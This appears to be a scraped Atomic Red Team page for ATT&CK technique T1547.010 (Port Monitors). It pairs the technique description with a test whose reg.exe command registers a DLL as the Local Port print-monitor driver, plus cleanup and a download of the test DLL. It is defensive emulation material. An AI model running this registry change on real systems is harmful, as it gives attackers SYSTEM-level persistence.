Try it using Invoke-Atomic

Port Monitors

Description from ATT&CK

Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

  • Local Port
  • Standard TCP/IP Port
  • USB Monitor
  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Change Windows Default Print Monitor

Register a malicious dll as a port monitor by changing the registry key. This can be used for persistence or privilege escalation.

Supported Platforms: windows

auto_generated_guid: 0778f116-a748-49c6-9633-122401744b26

Inputs:

Name Description Type Default Value
dll_payload DLL to inject Path PathToAtomicsFolder\T1547.010\src\x64\T1547.dll

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2

reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d #{dll_payload} /f

Cleanup Commands:

1
2

reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d localspl.dll /f

Dependencies: Run with powershell!

Description: T1547.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

1
2

if (Test-Path #{dll_payload}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3

New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.010/src/x64/T1547.dll" -OutFile "#{dll_payload}"

source